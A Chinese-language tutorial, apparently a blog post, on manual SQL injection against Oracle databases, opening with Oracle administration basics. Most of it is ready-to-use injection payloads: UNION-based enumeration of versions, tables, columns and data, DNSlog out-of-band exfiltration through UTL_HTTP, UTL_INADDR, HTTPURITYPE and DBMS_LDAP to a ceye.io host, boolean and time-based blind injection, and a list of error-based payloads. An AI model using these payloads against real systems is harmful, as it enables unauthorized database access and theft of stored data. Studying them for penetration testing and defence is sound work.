Oracle数据库手注

0x00前言
Oracle 使用查询语句获取数据时需要跟上表名,没有表的情况下可以使用dual,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录。
Oracle的数据类型是强匹配的(MYSQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。
 
0x01环境
  • 服务器:win server 2008
  • 中间件:IIS7.0
  • 数据库:Oracle Database 18c企业版版本18.0.0.0.0
  • 前端语言:ASP

 
 
0x02Oracle数据库基础
一、Oracle数据库操作
1、创建数据库
create database databasename

2、删除数据库
drop database dbname

3、备份数据库
* 完全备份
exp demo/demo@orcl buffer=1024 file=d:\back.dmp full=y
demo:用户名、密码
buffer: 缓存大小
file: 具体的备份文件地址
full: 是否导出全部文件
ignore: 忽略错误,如果表已经存在,则也是覆盖
* 将数据库中system用户与sys用户的表导出
exp demo/demo@orcl file=d:\backup\1.dmp owner=(system,sys)
* 导出指定的表
exp demo/demo@orcl file=d:\backup2.dmp tables=(teachers,students)
* 按过滤条件,导出
exp demo/demo@orcl file=d:\back.dmp tables=(table1) query=\" where filed1 like 'fg%'\"
导出时可以进行压缩;命令后面 加上 compress=y ;如果需要日志,后面: log=d:\log.txt
* 备份远程服务器的数据库
exp 用户名/密码@远程的IP:端口/实例 file=存放的位置:\文件名称.dmp full=y

 4、数据库还原
打开cmd直接执行如下命令,不用再登陆sqlplus。
* 完整还原
imp demo/demo@orcl file=d:\back.dmp full=y ignore=y log=D:\implog.txt
指定log很重要,便于分析错误进行补救。
* 导入指定表
imp demo/demo@orcl file=d:\backup2.dmp tables=(teachers,students)
* 还原到远程服务器
imp 用户名/密码@远程的IP:端口/实例 file=存放的位置:\文件名称.dmp full=y











二、Oracle表操作
1、创建表
create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null],..)
根据已有的表创建新表:
A:select * into table_new from table_old (使用旧表创建新表)
B:create table tab_new as select col1,col2… from tab_old definition only<仅适用于Oracle>

2、删除表
drop table tabname

3、重命名表
  说明:alter table 表名 rename to 新表名
eg:alter table tablename rename to newtablename

4、增加字段
说明:alter table 表名 add (字段名 字段类型 默认值 是否为空);
例:alter table tablename add (ID int);
eg:alter table tablename add (ID varchar2(30) default '空' not null);

5、修改字段
说明:alter table 表名 modify (字段名 字段类型 默认值 是否为空);
eg:alter table tablename modify (ID number(4));

6、重名字段
说明:alter table 表名 rename column 列名 to 新列名 (其中:column是关键字)
eg:alter table tablename rename column ID to newID;

7、删除字段
  
说明:alter table 表名 drop column 字段名;
eg:alter table tablename drop column ID;

8、添加主键
alter table tabname add primary key(col)

9、删除主键
alter table tabname drop primary key(col)

10、创建索引
create [unique] index idxname on tabname(col….)

11、删除索引
 
  drop index idxname
注:索引是不可更改的,想更改必须删除重新建。

12、创建视图
create view viewname as select statement

13、删除视图
drop view viewname

三、Oracle操作数据
1、数据查询
select <列名> from <表名> [where <查询条件表达试>] [order by <排序的列名>[asc或desc]]

2、插入数据
insert into 表名 values(所有列的值);
eg: insert into test values(1,'zhangsan',20);

insert into 表名(列) values(对应的值);
eg: insert into test(id,name) values(2,'lisi');

3、更新数据
update 表 set 列=新的值 [where 条件] -->更新满足条件的记录
eg: update test set name='zhangsan2' where name='zhangsan'

update 表 set 列=新的值 -->更新所有的数据
eg: update test set age =20;

4、删除数据
* delete from 表名 where 条件 -->删除满足条件的记录
delete from test where id = 1;
delete from test -->删除所有
commit; -->提交数据
rollback; -->回滚数据
delete方式可以恢复删除的数据,但是提交了,就没办法了 delete删除的时候,会记录日志 -->删除会很慢很慢
* truncate table 表名
删除所有数据,不会影响表结构,不会记录日志,数据不能恢复 -->删除很快
* drop table 表名
删除所有数据,包括表结构一并删除,不会记录日志,数据不能恢复-->删除很快

5、数据复制
* 表数据复制
insert into table1 (select * from table2);
* 复制表结构
create table table1 select * from table2 where 1>1;
* 复制表结构和数据
create table table1 select * from table2;
* 复制指定字段
create table table1 as select id, name from table2 where 1>1;
 
 
0x03判断注入点
1.判断注入点类型(同MYSQL注入)

TIM截图20190708180910.png
'错误显示
' and 1=1 --显示错误
and 1=1 显示正常
and 1=2 显示错误
则为无闭合符
 
0x04联合查询
1.判断列数:
order by 3  显示正常
order by 4 显示错误
则为有三列数据

 
2.判断字符类型
oracle自带虚拟表dual,oracle的查询语句必须完整的包含from字句,且每个字段的类型都要准确对应,一般使用null来判断类型。
and 1=2 union select null,null,null from dual    返回正常

and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是数字型,反之为字符型
第一个字段是字符型,判断第二个字段类型:
and 1=2 union select 'null','null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
第一个字段是数字型,判断第二个字段类型:
and 1=2 union select null,'null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型

TIM截图20190708182255.png


3.判断显示位
and 1=2 union select 1,'2','3' from dual --    将null用数字代替,上面判断出为字符型的加上单引号,即可判断出对应的显示位

TIM截图20190708184239.png

 
4.探测数据库版本信息
rownum 对于等于某值的查询条件
如果希望找到学生表中第一条学生的信息,可以使用rownum=1作为条件。但是想找到学生表中第二条学生的信息,使用rownum=2结果查不到数据。因为rownum都是从1开始,但是1以上的自然数在rownum做等于判断是时认为都是false条件,所以无法查到rownum = n(n>1的自然数) 
and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual --

TIM截图20190709094254.png


5.探测第一个表名
user_tables表为Oracle数据库的默认表,表下有字段table_name对应所有用户创建的表名
and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual --

TIM截图20190709095138.png


6.探测第二个表名
注意,查询第二个表时,利用筛选方法,即排除第一个表:table_name<>'STUDENT'
and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'STUDENT'),null from dual --

TIM截图20190709102423.png


7.探测关键表的字段
user_tab_columns表为Oracle数据库的默认表, 表下有字段table_name和column_name对应所有的用户创建的表名,字段名
and 1=2 union select null,(select column_name from user_tab_columns where table_name='STUDENT' and rownum=1),null from dual --

and 1=2 union select null,(select column_name from user_tab_columns where table_name='STUDENT' and rownum=1 and column_name<>'ID'),null from dual -- 排除第一个字段名ID

tand 1=2 union select null,(select column_name from user_tab_columns where table_name='STUDENT' and rownum=1 and column_name<>'ID' and column_name<>'NAME'),null from dual -- 排除前两个字段名ID和NAME







TIM截图20190709101904.png


TIM截图20190709102756.png


8.探测关键字段的数据
and 1=2 union select id,name,pass from student where id=3  --

TIM截图20190709104438.png

Oracle联合查询——DNSlog注入
此方法需要Oracle数据库用户拥有网络访问权限
手动添加权限参考 http://blog.itpub.net/26736162/viewspace-2072163/
UTL_HTTP.REQUEST
union SELECT null,UTL_HTTP.REQUEST((select table_name from user_tables where rownum=1)||'.8dktk9.ceye.io'),null FROM DUAL



TIM截图20190711160806.png


UTL_INADDR.GET_HOST_ADDRESS
union SELECT null,UTL_INADDR.GET_HOST_ADDRESS((select table_name from user_tables where rownum=1)||'.here.8dktk9.ceye.io'),null FROM DUAL



HTTPURITYPE
union SELECT null,HTTPURITYPE((select table_name from user_tables where rownum=1)||'.port.8dktk9.ceye.io').GETCLOB(),null FROM DUAL

DBMS_LDAP.INIT
union SELECT null,DBMS_LDAP.INIT((select table_name from user_tables where rownum=1)||'.port.8dktk9.ceye.io',80),null FROM DUAL


0x05盲注
一、布尔盲注
1.获取数据表个数
count()函数获取字符串个数
and (select count(table_name) from user_tables)>2 --    页面报错
and (select count(table_name) from user_tables)=2 -- 页面正常,即表个数为2

TIM截图20190709111623.png


2.获取第一个表的字符个数
length()函数判断字符个数
and (select length(table_name) from user_tables where rownum=1)>7 --  页面报错
and (select length(table_name) from user_tables where rownum=1)=7 -- 页面正常 ,即第一个表的字符数为7












TIM截图20190709112122.png



2.获取第一个表的第一个字符
substr( )函数
substring()
作用:截取字符串
用法:substr(string,num start,num length)
           string 为字符串
           start  为起始长度从1开始
           length 为长度
 
ascii()函数
作用:返回字符串str的字符ASCII码值。入果str是空字符串,返回0,入果string是NULL,返回NULL
and ascii(substr((select table_name from user_tables where rownum=1),1,1))=83 --  页面正常,即第一个字符为ascii值83所对应的字母。为W
 
TIM截图20190709113018.png



二、时间盲注
对oracle进行时间盲注通常使用decode()函数
decode函数有很多种功能,在这里我们主要用到它可以比较字符串的功能。类似if-then语句。
 
DECODE(expr, search, result
             [, search, result ]...
       [, default ]
      )
DECODE函数会依次比较expr与search的值,如果expr等于search的值,那么DECODE函数将会返回search后面对应的result的值。如果到最后也没有匹配成功,那么便会返回最后面的default
 
类似 C++ 里面的switch语句。
 
该Payload的核心思想便是,根据表达式与search的值是否匹配,来决定是否执行高耗时SQL操作。
 
例如:(select count(*) from all_objects),对数据库中大量数据进行查询或其他处理的操作,这样的操作会耗费较多的时间,然后通过这个方式来获取数据。这种方式也适用于其他数据库。
 
1.探测第一个表名的第一个字符
and 1=(select decode(substr((select table_name from user_tables where rownum=1),1,1),'S',(select count(*) from all_objects),1) from dual)    执行这条语句是页面延迟,即第一个表名的第一个字符为S

TIM截图20190709162609.png



0x06报错注入
1.使用 dbms_xdb_version.checkin()进行报错注入
and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --   探测数据库版本信息

 
TIM截图20190709123525.png



2.使用dbms_xdb_version.makeversioned()进报错注入
and (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum=1)) from dual) is not null --

 
TIM截图20190709123303.png



3.报错注入其他payload
and (select dbms_xdb_version.uncheckout((select banner from sys.v_$version where rownum=1)) from dual) is not null --
and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null --
and (select dbms_streams.get_information((select banner from sys.v_$version where rownum=1)) from dual) is not null --
and (select dbms_xmlschema.generateschema((select banner from sys.v_$version where rownum=1)) from dual) is not null --
and (select dbms_xmltranslations.extractxliff((select banner from sys.v_$version where rownum=1)) from dual) is not null --

and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user) --
and 1=utl_inaddr.get_host_name((select banner from sys.v_$version where rownum=1))--
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))--
and (select upper(XMLType(chr(60)||chr(58)||(select banner from sys.v_$version where rownum=1)||chr(62))) from dual) is not null--

 
 
 
0x07参考文献
 
http://www.teagle.top/index.php/archives/149/
https://www.freebuf.com/column/146464.html
 
http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
 
https://docs.oracle.com/cd/B19306_01/server.102/b14200/functions040.htm

1 个评论

谢大佬分享,很全面

要回复文章请先登录注册